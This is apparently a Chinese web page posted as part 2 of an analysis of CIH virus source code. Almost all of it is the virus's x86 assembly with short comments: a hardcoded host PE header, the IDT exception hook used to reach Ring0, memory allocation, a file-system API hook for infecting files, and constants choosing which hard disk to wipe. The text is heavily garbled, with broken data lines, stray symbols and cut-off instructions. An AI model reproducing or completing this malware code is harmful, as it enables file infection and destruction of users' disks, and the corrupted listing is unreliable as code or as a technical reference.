病毒程式原始碼實例剖析-CIH病毒[2]
- 黄舟原創
- 2017-01-17 11:15:082234瀏覽
病毒程式原始碼實例剖析-CIH病毒[2]
OriginalAppEXE SEGMENT
;PE格式可執行文件文件頭
FileHeader:
db 04dh, 05ah, 090h, 003, db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000,
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000,h
dbh000h, 000, 00h,000h 0h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h , 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001
db 021h, 0b8h, 01
db 021h, 0b8h, 001
db 021h, 0b8h, 015,
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 0200h 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh , 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h50, 000h, 000h, 000h, 000h,000, 0h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h , 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
, dbh 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h . 0h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h , 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000]h 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 0000, 000, 0h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 0000, 000h, 000h. 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000, 000, 0h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h , 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000,000 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000, 000, 0h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h , 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000,000 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074, 003〴 h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000,000, 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000,
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000,h
dbh000h, 000, 00h,000h 0h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h 000h 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
0 db 0h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h , 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 㟎 㟀OriginalAppEXE ENDS
; 病毒程式開始
TRUE = 1
FALSE = 0 ;標識其版本號為1.4版
MajorVirusVersion = 1 ;主版號
MinorVirusVersion = 4 ;次版本號
VirusVersion = MajorVirusVersion*10h+Minorrus ;是否調試
FirstKillHardDiskNumber = 81h ;破壞D盤
HookExceptionNumber = 05h ;使用5號中斷
ELSE
FirstKillHardDiskNumber = 80h ;破壞C盤
Hookx〠Number = 80h ;破壞C盤
Hookx〠Number = 0336d FileNameBufferSize = 7fh
;病毒程式碼段開始
VirusGame SEGMENT
VirusGame SEGMENT
ASS UMEame) , DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
🎀 MyVirusStart:
🎀 〜、rusStart:
『 異常處理,避免產生錯誤提示訊息
lea eax, [esp-04h* 2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0 eb 起始量
call @0 比用此偏移量+相對偏移量獲得絕對位址
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
〠
push eax
〠
push eax
『
sidt [esp-02h] ;取得中斷描述表的基址到ebx
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ;計算要用中斷的基址到ebx 🀜 mov ebp, [ebx] ;獲得異常處理的基地址
mov bp, [ebx-04h] ;取得入口
lea esi, MyExceptionHook-@1[ecx]
〜『 mov [ebx-04h], si ;
shr esi, 16 ;修改異常
mov [ebx+02h], si ;修改中斷基址使指向病毒中斷例程
pop esi 級中斷
pop 是方式進入Ring0級
ReturnAddressOfEndException = $
; 合併所有病毒代碼
push esi
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep病毒程式碼到分配好的系統記憶體首址
sub eax, 08h
mov esi, [eax]
or esi, esi 🎀 H jmp LoopOfMergeAllVirusCodeSection ;複製下一段
QuitLoopOfMergeAllVirusCodeSection:
pop esi『 HookExceptionNumber
; 保存異常處理
ReadyRestoreSE:
sti ;開中斷造
CLmp xor eb sti ;開中斷
; 當發生異常時,表示目前在Windows NT下,病毒將停止運行,直接跳到原來程式
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; 跳躍到原程序,正常執行
pop ebp
push 00401000h ; Push Original
棧 OriginalAddressOfEntryPoint = $48EntryPoint ;
;病毒初始化模組
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook; mov ecx, dr0 ;察看dr0是否有設定(dr0為病毒駐留標誌)
jecxz AllocateSystemMemoryPage ;沒有設置,則分配系統記憶體
add dword ptr [esp], ReadyRestoreSE-ReturnAddfEndEnd『 ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;恢復原來的中斷基址
iretd ;中斷返回
mov dr0, ebx ;設定病毒駐留的標誌dr0
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecxc •Acated ONG pType, ULONG VM, ULONG AlignMask, ULONG minPhys,
;ULONG maxPhys, ULONG *PhysAddr,ULONG flags);
push ecx ;
push ecx ;
push 000000001h ;
push 00000001h ;
push 000000001h ;
〜 push 000000001h ; _PageAllocate = $
dd 00010053h ;使用eax、ecx、edx和flags暫存器
add esp, 08h*04h ;恢復堆疊指標
xchg edi, ex
xchg ? ;eax指向病毒開始處
iretd ;退出中斷
; 初始化檔案系統鉤子
鎧.程式首址
push eax ;
int 20h ; Vxd呼叫IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h ;使用eax、ecwaxedx和flags 寄存器子程式首址到dr0
pop eax ;eax等於檔案系統鉤子程式首址
;保存原有的IFSMgr_InstallFileSystemApiHook功能呼叫的入口
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] ion) Hook的入口
mov OldInstallFileSystemApiHook-@3[eax], edx
; 修改IFSMgr_InstallFileSystemApiHook入口
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax; cli ;關中斷
以上就是病毒程式原始碼實例剖析-CIH病毒[2]的內容,更多相關內容請關注PHP中文網(www.php.cn)!